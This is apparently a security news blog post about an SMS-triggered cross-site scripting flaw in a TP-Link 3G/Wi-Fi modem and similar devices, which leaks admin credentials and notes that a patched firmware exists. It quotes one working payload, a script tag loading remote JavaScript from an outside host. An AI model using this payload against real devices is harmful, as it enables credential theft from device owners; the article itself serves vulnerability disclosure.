TP-Link 3G/Wi-Fi Modem Spoke with Admin Login

Share it:
A security researcher Jan Hörsch from German security firm Securai, have discovered an interesting security flaw on TP-Link product that gives admin login details in response for an simple but evil text message.

The vulnerability was an Cross Site Scripting (XSS) bug that can triggered by sending an SMS containing the following payload, <script src=//n.ms/a.js></script>


The device’s admin credentials can be retrieved by an attacker with a simple text message, the router replies with admin username, admin password, its SSID, and its login password.

Not only TP-Link, Panasonic BM ET200 retina scanner and a Startech modem are also prone to the same vulnerability and same exploit works smoothly.

This is not the first time for Hörsch. Earlier also he had done intensive research on IOT devices and found multiple vulnerabilities. With his findings he had also appeared at last Kaspersky Security Analyst Submit.

Currently, firm have fixed the issue and release the patch for it. Users can download the patched firmware from the download page.
Share it:

Research

Security

Vulnerability

Post A Comment:

0 comments:

Follow by Email